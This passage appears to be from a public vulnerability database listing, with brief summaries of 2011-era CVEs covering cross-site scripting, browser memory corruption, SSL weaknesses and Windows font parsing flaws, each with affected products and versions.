Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3393] Multiple cross-site scripting (XSS) vulnerabilities in findagent.php in MYRE Real Estate Software allow remote attackers to inject arbitrary web script or HTML via the (1) country1, (2) state1, or (3) city1 parameter. [CVE-2011-3392] Cross-site scripting (XSS) vulnerability in control.php in the controlcenter in Phorum before 5.2.17 allows remote attackers to inject arbitrary web script or HTML via the real_name parameter. [CVE-2011-3390] Multiple cross-site scripting (XSS) vulnerabilities in index.php in IBM OpenAdmin Tool (OAT) before 2.72 for Informix allow remote attackers to inject arbitrary web script or HTML via the (1) informixserver, (2) host, or (3) port parameter in a login action. [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-3385] Cross-site scripting (XSS) vulnerability in WebsiteBaker before 2.8, as used in LEPTON and possibly other products, allows remote attackers to inject arbitrary web script or HTML via unknown vectors, a different vulnerability than CVE-2006-2307. [CVE-2011-3384] Cross-site scripting (XSS) vulnerability in the Sage add-on 1.3.10 and earlier for Firefox allows remote attackers to inject arbitrary web script or HTML via a crafted feed, a different vulnerability than CVE-2009-4102. [CVE-2011-3383] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to "the web page to be output." [CVE-2011-3382] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.16 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality. [CVE-2011-3371] Multiple cross-site scripting (XSS) vulnerabilities in include/functions.php in PunBB before 1.3.6 allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) form_sent, (3) csrf_token, (4) req_confirm, or (5) delete parameter to delete.php, the (6) id, (7) form_sent, (8) csrf_token, (9) req_message, or (10) submit parameter to edit.php, the (11) action, (12) form_sent, (13) csrf_token, (14) req_email, or (15) request_pass parameter to login.php, the (16) email, (17) form_sent, (18) redirect_url, (19) csrf_token, (20) req_subject, (21) req_message, or (22) submit parameter to misc.php, the (23) action, (24) id, (25) form_sent, (26) csrf_token, (27) req_old_password, (28) req_new_password1, (29) req_new_password2, or (30) update parameter to profile.php, or the (31) action, (32) form_sent, (33) csrf_token, (34) req_username, (35) req_password1, (36) req_password2, (37) req_email1, (38) timezone, or (39) register parameter to register.php. [CVE-2011-3361] Cross-site scripting (XSS) vulnerability in CGI/Browse.pm in BackupPC 3.2.0 and possibly other versions before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via the num parameter in a browse action to index.cgi. [CVE-2011-3358] Multiple cross-site scripting (XSS) vulnerabilities in MantisBT before 1.2.8 allow remote attackers to inject arbitrary web script or HTML via the (1) os, (2) os_build, or (3) platform parameter to (a) bug_report_page.php or (b) bug_update_advanced_page.php, related to use of the Projax library. [CVE-2011-3356] Multiple cross-site scripting (XSS) vulnerabilities in config_defaults_inc.php in MantisBT before 1.2.8 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO, as demonstrated by the PATH_INFO to (1) manage_config_email_page.php, (2) manage_config_workflow_page.php, or (3) bugs/plugin.php. [CVE-2011-3339] Cross-site scripting (XSS) vulnerability in the Admin Control Center in Sentinel HASP Run-time Environment 5.95 and earlier in SafeNet Sentinel HASP (formerly Aladdin HASP SRM) run-time installer before 6.x and SDK before 5.11, as used in 7 Technologies (7T) IGSS 7 and other products, when Firefox 2.0 is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger write access to a configuration file. [CVE-2011-3320] Cross-site scripting (XSS) vulnerability in the Web Administrator component in GE Intelligent Platforms Proficy Historian 4.x and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-3319] Buffer overflow in the WRF parsing functionality in the Cisco WebEx Recording Format (WRF) player T26 before SP49 EP40 and T27 before SP28 allows remote attackers to execute arbitrary code via a crafted WRF file. [CVE-2011-3317] Multiple cross-site scripting (XSS) vulnerabilities in the Solution Engine in Cisco Secure Access Control Server (ACS) 5.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtr78192. [CVE-2011-3254] Cross-site scripting (XSS) vulnerability in Calendar in Apple iOS before 5 allows remote attackers to inject arbitrary web script or HTML via an invitation note. [CVE-2011-3246] CFNetwork in Apple iOS before 5.0.1 and Mac OS X 10.7 before 10.7.2 does not properly parse URLs, which allows remote attackers to trigger visits to unintended web sites, and transmission of cookies to unintended web sites, via a crafted (1) http or (2) https URL. [CVE-2011-3244] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3243] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. [CVE-2011-3242] The Private Browsing feature in Apple Safari before 5.1.1 on Mac OS X does not properly recognize the Always value of the Block Cookies setting, which makes it easier for remote web servers to track users via a cookie. [CVE-2011-3241] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3239] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3238] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3237] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3236] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3235] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3233] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-3231] The SSL implementation in Apple Safari before 5.1.1 on Mac OS X before 10.7 accesses uninitialized memory during the processing of X.509 certificates, which allows remote web servers to execute arbitrary code via a crafted certificate. [CVE-2011-3230] Apple Safari before 5.1.1 on Mac OS X does not enforce an intended policy for file: URLs, which allows remote attackers to execute arbitrary code via a crafted web site. [CVE-2011-3227] libsecurity in Apple Mac OS X before 10.7.2 does not properly handle errors during processing of a nonstandard extension in a Certificate Revocation list (CRL), which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) a crafted (1) web site or (2) e-mail message. [CVE-2011-3218] The "Save for Web" selection in QuickTime Player in Apple Mac OS X through 10.6.8 exports HTML documents that contain an http link to a script file, which allows man-in-the-middle attackers to conduct cross-site scripting (XSS) attacks by spoofing the http server during local viewing of an exported document. [CVE-2011-3213] The File Systems component in Apple Mac OS X before 10.7.2 does not properly track the specific X.509 certificate that a user manually accepted for an initial https WebDAV connection, which allows man-in-the-middle attackers to hijack WebDAV communication by presenting an arbitrary certificate for a subsequent connection. [CVE-2011-3182] PHP before 5.3.7 does not properly check the return values of the malloc, calloc, and realloc library functions, which allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger a buffer overflow by leveraging the ability to provide an arbitrary value for a function argument, related to (1) ext/curl/interface.c, (2) ext/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4) ext/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6) ext/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8) ext/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10) TSRM/tsrm_win32.c, and (11) the strtotime function. [CVE-2011-3181] Multiple cross-site scripting (XSS) vulnerabilities in the Tracking feature in phpMyAdmin 3.3.x before 3.3.10.4 and 3.4.x before 3.4.4 allow remote attackers to inject arbitrary web script or HTML via a (1) table name, (2) column name, or (3) index name. [CVE-2011-3144] Cross-site scripting (XSS) vulnerability in Control Microsystems ClearSCADA 2005, 2007, and 2009 before R2.3 and R1.4, as used in SCX before 67 R4.5 and 68 R3.9, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3142] Stack-based buffer overflow in an ActiveX control in KVWebSvr.dll in WellinTech KingView 6.52 and 6.53 allows remote attackers to execute arbitrary code via a long second argument to the ValidateUser method. [CVE-2011-3140] IBM Web Application Firewall, as used on the G400 IPS-G400-IB-1 and GX4004 IPS-GX4004-IB-2 appliances with update 31.030, does not properly handle query strings with multiple instances of the same parameter, which allows remote attackers to bypass intended intrusion prevention by dividing a dangerous parameter value into substrings, as demonstrated by a SQL statement that is split across multiple iid parameters and then sent to a .aspx file on an IIS web server. [CVE-2011-3133] Session fixation vulnerability in TIBCO Spotfire Server 3.0.x before 3.0.2, 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.1, and Spotfire Analytics Server before 10.1.1, allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-3132] Cross-site scripting (XSS) vulnerability in TIBCO Spotfire Server 3.0.x before 3.0.2, 3.1.x before 3.1.2, 3.2.x before 3.2.1, and 3.3.x before 3.3.1, and Spotfire Analytics Server before 10.1.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3127] WordPress 3.1 before 3.1.3 and 3.2 before Beta 2 does not prevent rendering for (1) admin or (2) login pages inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. [CVE-2011-3106] The WebSockets implementation in Google Chrome before 19.0.1084.52 does not properly handle use of SSL, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-3083] browser/profiles/profile_impl_io_data.cc in Google Chrome before 19.0.1084.46 does not properly handle a malformed ftp URL in the SRC attribute of a VIDEO element, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted web page. [CVE-2011-3054] The WebUI privilege implementation in Google Chrome before 17.0.963.83 does not properly perform isolation, which allows remote attackers to bypass intended access restrictions via unspecified vectors. [CVE-2011-3052] The WebGL implementation in Google Chrome before 17.0.963.83 does not properly handle CANVAS elements, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2011-3049] Google Chrome before 17.0.963.83 does not properly restrict the extension web request API, which allows remote attackers to cause a denial of service (disrupted system requests) via a crafted extension. [CVE-2011-3013] WebAdmin in the Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 supports weak SSL ciphers, which makes it easier for remote attackers to obtain access via a brute-force attack. [CVE-2011-3010] Multiple cross-site scripting (XSS) vulnerabilities in TWiki before 5.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the newtopic parameter in a WebCreateNewTopic action, related to the TWiki.WebCreateNewTopicTemplate topic [CVE-2011-3004] The JSSubScriptLoader in Mozilla Firefox 4.x through 6 and SeaMonkey before 2.4 does not properly handle XPCNativeWrappers during calls to the loadSubScript method in an add-on, which makes it easier for remote attackers to gain privileges via a crafted web site that leverages certain unwrapping behavior. [CVE-2011-3003] Mozilla Firefox before 7.0 and SeaMonkey before 2.4 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unspecified WebGL test case that triggers a memory-allocation error and a resulting out-of-bounds write operation. [CVE-2011-3001] Mozilla Firefox 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not prevent manual add-on installation in response to the holding of the Enter key, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site that triggers an unspecified internal error. [CVE-2011-2999] Mozilla Firefox before 3.6.23 and 4.x through 5, Thunderbird before 6.0, and SeaMonkey before 2.3 do not properly handle "location" as the name of a frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site, a different vulnerability than CVE-2010-0170. [CVE-2011-2993] The implementation of digital signatures for JAR files in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, and possibly other products does not prevent calls from unsigned JavaScript code to signed code, which allows remote attackers to bypass the Same Origin Policy and gain privileges via a crafted web site, a different vulnerability than CVE-2008-2801. [CVE-2011-2989] The browser engine in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, Thunderbird before 6, and possibly other products does not properly implement WebGL, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2011-2988] Buffer overflow in an unspecified string class in the WebGL shader implementation in Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long source-code block for a shader. [CVE-2011-2987] Heap-based buffer overflow in Almost Native Graphics Layer Engine (ANGLE), as used in the WebGL implementation in Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products might allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2983] Mozilla Firefox before 3.6.20, Thunderbird 2.x and 3.x before 3.1.12, SeaMonkey 1.x and 2.x, and possibly other products does not properly handle the RegExp.input property, which allows remote attackers to bypass the Same Origin Policy and read data from a different domain via a crafted web site, possibly related to a use-after-free. [CVE-2011-2981] The event-management implementation in Mozilla Firefox before 3.6.20, SeaMonkey 2.x, Thunderbird 3.x before 3.1.12, and possibly other products does not properly select the context for script to run in, which allows remote attackers to bypass the Same Origin Policy or execute arbitrary JavaScript code with chrome privileges via a crafted web site. [CVE-2011-2976] Cross-site scripting (XSS) vulnerability in Bugzilla 2.16rc1 through 2.22.7, 3.0.x through 3.3.x, and 3.4.x before 3.4.12 allows remote attackers to inject arbitrary web script or HTML via vectors involving a BUGLIST cookie. [CVE-2011-2958] Multiple cross-site scripting (XSS) vulnerabilities in Ecava IntegraXor before 3.60 (Build 4080) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2947] Cross-zone scripting vulnerability in the RealPlayer ActiveX control in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5 and RealPlayer SP 1.0 through 1.1.5 allows remote attackers to inject arbitrary web script or HTML in the Local Zone via a local HTML document. [CVE-2011-2942] A certain Red Hat patch to the __br_deliver function in net/bridge/br_forward.c in the Linux kernel 2.6.18 on Red Hat Enterprise Linux (RHEL) 5 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by leveraging connectivity to a network interface that uses an Ethernet bridge device. [CVE-2011-2938] Multiple cross-site scripting (XSS) vulnerabilities in filter_api.php in MantisBT before 1.2.7 allow remote attackers to inject arbitrary web script or HTML via a parameter, as demonstrated by the project_id parameter to search.php. [CVE-2011-2937] Cross-site scripting (XSS) vulnerability in the UI messages functionality in Roundcube Webmail before 0.5.4 allows remote attackers to inject arbitrary web script or HTML via the _mbox parameter to the default URI. [CVE-2011-2932] Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a malformed Unicode string, related to a "UTF-8 escaping vulnerability." [CVE-2011-2931] Cross-site scripting (XSS) vulnerability in the strip_tags helper in actionpack/lib/action_controller/vendor/html-scanner/html/node.rb in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a tag with an invalid name. [CVE-2011-2904] Cross-site scripting (XSS) vulnerability in acknow.php in Zabbix before 1.8.6 allows remote attackers to inject arbitrary web script or HTML via the backurl parameter. [CVE-2011-2900] Stack-based buffer overflow in the (1) put_dir function in mongoose.c in Mongoose 3.0, (2) put_dir function in yasslEWS.c in yaSSL Embedded Web Server (yasslEWS) 0.2, and (3) _shttpd_put_dir function in io_dir.c in Simple HTTPD (shttpd) 1.42 allows remote attackers to execute arbitrary code via an HTTP PUT request, as exploited in the wild in 2011. [CVE-2011-2894] Spring Framework 3.0.0 through 3.0.5, Spring Security 3.0.0 through 3.0.5 and 2.0.0 through 2.0.6, and possibly other versions deserialize objects from untrusted sources, which allows remote attackers to bypass intended security restrictions and execute untrusted code by (1) serializing a java.lang.Proxy instance and using InvocationHandler, or (2) accessing internal AOP interfaces, as demonstrated using deserialization of a DefaultListableBeanFactory instance to execute arbitrary commands via the java.lang.Runtime class. [CVE-2011-2892] Joomla! 1.6.x before 1.6.2 does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. [CVE-2011-2873] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2872] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2871] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2870] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2869] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2868] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2867] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2866] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2011-2849] The WebSockets implementation in Google Chrome before 14.0.835.163 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors. [CVE-2011-2833] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2011-2831] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2820] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2817] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2816] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2815] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2814] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2813] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2811] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2809] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2802] Google V8, as used in Google Chrome before 13.0.782.107, does not properly perform const lookups, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted web site. [CVE-2011-2800] Google Chrome before 13.0.782.107 allows remote attackers to obtain potentially sensitive information about client-side redirect targets via a crafted web site. [CVE-2011-2798] Google Chrome before 13.0.782.107 does not properly restrict access to internal schemes, which allows remote attackers to have an unspecified impact via a crafted web site. [CVE-2011-2795] Google Chrome before 13.0.782.107 does not prevent calls to functions in other frames, which allows remote attackers to bypass intended access restrictions via a crafted web site, related to a "cross-frame function leak." [CVE-2011-2786] Google Chrome before 13.0.782.107 does not ensure that the speech-input bubble is shown on the product's screen, which might make it easier for remote attackers to make audio recordings via a crafted web page containing an INPUT element. [CVE-2011-2771] Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) URI attributes and (2) the External Feed component, as demonstrated by the guid element in an RSS feed. [CVE-2011-2770] Cross-site scripting (XSS) vulnerability in man2html.cgi.c in man2html 1.6, and possibly other version, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to error messages. [CVE-2011-2761] Google Chrome 14.0.794.0 does not properly handle a reload of a page generated in response to a POST, which allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web site, related to GetWidget methods. [CVE-2011-2759] The login page of IDSWebApp in the Web Administration Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.3-TIV-ITDS-IF0004 does not have an off autocomplete attribute for authentication fields, which makes it easier for remote attackers to obtain access by leveraging an unattended workstation. [CVE-2011-2758] IDSWebApp in the Web Administration Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.3-TIV-ITDS-IF0004 does not require authentication for access to LDAP Server log files, which allows remote attackers to obtain sensitive information via a crafted URL. [CVE-2011-2754] Cross-site scripting (XSS) vulnerability in the PageBuilder2 (aka Page Builder) theme in IBM WebSphere Portal 7.x before 7.0.0.1 CF006, as used in IBM Web Content Manager (WCM) and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2743] Multiple cross-site scripting (XSS) vulnerabilities in Chyrp 2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the action parameter to (1) the default URI or (2) includes/javascript.php, or the (3) title or (4) body parameter to admin/help.php. [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-2711] Cross-site scripting (XSS) vulnerability in the print_fileinfo function in ui-diff.c in cgit 0.9.0.2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the filename associated with the rename hint. [CVE-2011-2710] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to includes/application.php, reachable through index.php [CVE-2011-2694] Cross-site scripting (XSS) vulnerability in the chg_passwd function in web/swat.c in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allows remote authenticated administrators to inject arbitrary web script or HTML via the username parameter to the passwd program (aka the user field to the Change Password page). [CVE-2011-2682] The Login component in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 allows remote authenticated users to cause a denial of service (license consumption) by trying to login to DOORS Web Access with a new user account that has never been used for a DOORS login. [CVE-2011-2681] IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 does not properly handle exceptions, which has unspecified impact and remote attack vectors. [CVE-2011-2680] Unspecified vulnerability in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 has unknown impact and remote attack vectors related to the "server error response." [CVE-2011-2679] Cross-site scripting (XSS) vulnerability in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2675] Cross-site scripting (XSS) vulnerability in Enkai-kun before 110916 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2673] Cross-site scripting (XSS) vulnerability in BaserCMS before 1.6.13.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2672] Cross-site scripting (XSS) vulnerability in SemanticScuttle before 0.98 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2661] Multiple cross-site scripting (XSS) vulnerabilities in WebAccess in Novell GroupWise 8.0 before HP3 allow remote attackers to inject arbitrary web script or HTML via the (1) Directory.Item.name or (2) Directory.Item.displayName parameter. [CVE-2011-2652] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via a crafted archive file list that is used in an overlay file. [CVE-2011-2650] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via a crafted pattern name that is included in an RPM info display. [CVE-2011-2644] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to an RPM info display. [CVE-2011-2642] Multiple cross-site scripting (XSS) vulnerabilities in the table Print view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3 and 3.4.x before 3.4.3.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name. [CVE-2011-2638] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by games on zylom.com. [CVE-2011-2637] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by futura-sciences.com, seoptimise.com, and mitosyfraudes.org. [CVE-2011-2636] Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by a certain Tomato Firmware page. [CVE-2011-2632] Opera before 11.11 does not properly handle destruction of a Silverlight instance, which allows remote attackers to cause a denial of service (application crash) via a web page, as demonstrated by vod.onet.pl. [CVE-2011-2631] The Cascading Style Sheets (CSS) implementation in Opera before 11.11 does not properly handle the column-count property, which allows remote attackers to cause a denial of service (infinite repaint loop and application hang) via a web page, as demonstrated by an unspecified Wikipedia page. [CVE-2011-2630] Opera before 11.11 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page that is not properly handled during a reload occurring after the opening of a popup of the Easy Sticky Note extension. [CVE-2011-2629] Unspecified vulnerability in Opera before 11.11 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by www.falk.de. [CVE-2011-2627] Unspecified vulnerability in the DOM implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web 